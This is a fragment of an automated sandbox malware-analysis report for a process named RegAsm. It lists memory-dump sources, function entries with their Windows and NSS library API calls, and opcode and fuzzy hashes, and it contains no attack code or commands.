                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: GlobalMemoryStatus_memset
                                                                                                        • String ID: @
                                                                                                        • API String ID: 587104284-2766056989
                                                                                                        • Opcode ID: ea78773fa3532b546fc2bed9ec4844f5fa5bd431fc3f66efb89effc32c35708b
                                                                                                        • Instruction ID: 109ca1747397a3c99a2e715ad0f668a42f12933073e5ea0efda9a81ab0e3fd91
                                                                                                        • Opcode Fuzzy Hash: ea78773fa3532b546fc2bed9ec4844f5fa5bd431fc3f66efb89effc32c35708b
                                                                                                        • Instruction Fuzzy Hash: 7BE0B8F1D002089BDB54DFA5ED46B5D77F89B08708F5000299A05F7181D674AA099659
                                                                                                        Function 6C1A0F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_GetPageSize.NSS3(6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F1B
                                                                                                          • Part of subcall function 6C1A1370: GetSystemInfo.KERNEL32(?,?,?,?,6C1A0936,?,6C1A0F20,6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000), ref: 6C1A138F
                                                                                                        • PR_NewLogModule.NSS3(clock,6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F25
                                                                                                          • Part of subcall function 6C1A1110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C1A0936,00000001,00000040), ref: 6C1A1130
                                                                                                          • Part of subcall function 6C1A1110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C1A0936,00000001,00000040), ref: 6C1A1142
                                                                                                          • Part of subcall function 6C1A1110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C1A0936,00000001), ref: 6C1A1167
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoModulePageSecureSizeSystemcallocstrdup
                                                                                                        • String ID: clock
                                                                                                        • API String ID: 536403800-3195780754
                                                                                                        • Opcode ID: 276a275e15462842c7bdfdf2e6b852f215c2d46e99ec9281d992d67aa96fe593
                                                                                                        • Instruction ID: de675a32e2fff7022cfad496cf4ca7cd0e9c2bb95808b848c446d4d42da23f8e
                                                                                                        • Opcode Fuzzy Hash: 276a275e15462842c7bdfdf2e6b852f215c2d46e99ec9281d992d67aa96fe593
                                                                                                        • Instruction Fuzzy Hash: D9D012396042889DC511A6E79D46BEAB6ACCBC3679F604926E10C41D10CA6590DFD265
                                                                                                        Function 6C210DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$calloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 3339632435-0
                                                                                                        • Opcode ID: 64fa7ccdfa1e7eaf8ebe51aa52a440148e5560d482a715eba145a49e712c8084
                                                                                                        • Instruction ID: 8815f8f709fc86c09bea79e6c4351ff0fca6c94cc7df9b6d2f23e442629dc0a0
                                                                                                        • Opcode Fuzzy Hash: 64fa7ccdfa1e7eaf8ebe51aa52a440148e5560d482a715eba145a49e712c8084
                                                                                                        • Instruction Fuzzy Hash: 7E31D271A58389CFDB00AF7EC5456A97BF8BF06309F01462DED8987E11DB3184A5CB82
                                                                                                        Function 6C210F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C1B2AF5,?,?,?,?,?,6C1B0A1B,00000000), ref: 6C210F1A
                                                                                                        • malloc.MOZGLUE(00000001), ref: 6C210F30
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C210F42
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C210F5B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Valuemallocmemcpystrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2332725481-0
                                                                                                        • Opcode ID: d1a30ab5cf85ed090343f86bfa9967a0b1da681ce8f68a637851c10ad5ed38ca
                                                                                                        • Instruction ID: 2f9c6a6d84dcc2474d73de8046c49128617015b7c7d64e9e5848b67328fee8da
                                                                                                        • Opcode Fuzzy Hash: d1a30ab5cf85ed090343f86bfa9967a0b1da681ce8f68a637851c10ad5ed38ca
                                                                                                        • Instruction Fuzzy Hash: 8301DD71F142885FE710277D9D06A5676ECEF52259F010235ED09C2E11DF31D565C6E2